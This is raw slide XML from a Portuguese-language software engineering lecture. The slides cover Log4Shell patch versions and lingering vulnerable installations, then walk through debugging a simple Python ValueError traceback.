              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
              </a:rPr>
              <a:t>From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Google Shape;696;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2662800" y="4624625"/>
            <a:ext cx="39510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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.cve.org/CVERecord?id=CVE-2021-44228</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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0" name="Shape 700"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="701" name="Google Shape;701;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1628396" y="465650"/>
            <a:ext cx="5173176" cy="1637500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114800" y="4714800"/>
            <a:ext cx="67098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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.scworld.com/news/vulnerable-instances-of-log4j-still-being-used-nearly-3-years-later</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314800" y="2688575"/>
            <a:ext cx="8370000" cy="9126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en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Almost 3 years after the discovery of the Log4Shell vulnerability, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
              </a:rPr>
              <a:t>13% of active Log4j installations are running vulnerable versions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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7" name="Shape 707"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1685875"/>
            <a:ext cx="8668800" cy="6093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3600"/>
              <a:t>Fim</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="709" name="Google Shape;709;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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2. Localizar o bug</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Descobrir e isolar o trecho de código (arquivo, método, comando) responsável pelo bug</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sugestão: i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>nspecionar o commit mais recente</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sugest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>ão: s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>e for um bug de run-time (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>"crash")</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Ler as mensagens de erro com calma</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Inspecionar o logging</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Inspecionar o stack trace</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Google Shape;153;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="288325" y="136925"/>
            <a:ext cx="3631800" cy="38715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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 1:  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> f1():</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 2:    f2()  </a:t>
            </a:r>
            <a:endParaRPr sz="1400">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t/>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 4:  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> f2():</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 5:    data = "invalid_int"</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 6:    f3(data)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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t/>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 8:  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> f3(value):</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 9:    f4(value)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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t/>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>11:  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> f4(value):</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>12:    result = int(value)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>13:    print(result)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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t/>
            </a:r>
            <a:endParaRPr sz="1400">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400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>15:  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> __name__ == "__main__":</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>16:     f1()</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4145975" y="136925"/>
            <a:ext cx="4810500" cy="38715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2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Traceback (most recent call last):</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  File "main.py", line 16, in &lt;module&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    f1()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    ^^^^</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  File "main.py", line 2, in f1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    f2()  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    ^^^^</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  File "main.py", line 6, in f2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    f3(data)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  File "main.py", line 9, in f3</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    f4(value)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  File "main.py", line 12, in f4</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    result = int(value)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>             ^^^^^^^^^^</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ValueError: invalid literal for int() with base 10: 'invalid_int'</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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61" name="Google Shape;161;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1304950" y="4189400"/>
            <a:ext cx="70137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latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>main() → f1() → f2() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>→ f3(fata)→ f4(value)</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="Google Shape;162;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776625" y="4756550"/>
            <a:ext cx="685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rPr>
              <a:t>falha</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4033425" y="4756550"/>
            <a:ext cx="1282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rPr>
              <a:t>bug/defeito</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3896600" y="4594625"/>
            <a:ext cx="397500" cy="156000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6538500" y="4602425"/>
            <a:ext cx="420900" cy="2259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